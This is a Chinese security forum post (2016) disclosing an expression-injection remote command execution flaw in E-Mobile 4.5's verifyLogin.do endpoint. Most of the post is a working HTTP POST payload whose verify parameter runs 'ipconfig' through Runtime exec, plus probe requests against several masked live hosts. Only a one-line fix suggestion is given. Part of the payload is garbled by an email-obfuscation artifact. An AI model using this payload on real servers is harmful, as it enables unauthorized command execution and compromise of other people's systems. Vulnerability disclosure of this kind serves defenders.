HanDs
管理员

[7月漏洞公开] 神器而已之EMobile某版本表达式注入(命令执行) 



神器扫出来的

详细说明:

code 区域
版本:E-Mobile 4.5
查看源码即可看到
**.**.**.**/verifyLogin.do
data:loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${@[email protected](@[email protected]().exec('ipconfig').getInputStream())}





表达式注入.png





code 区域
其他案例

http://**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**:89/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}

漏洞证明:

详细说明

修复方案:

过滤下变量。。。


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
神器 而已 E Mo bi le
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复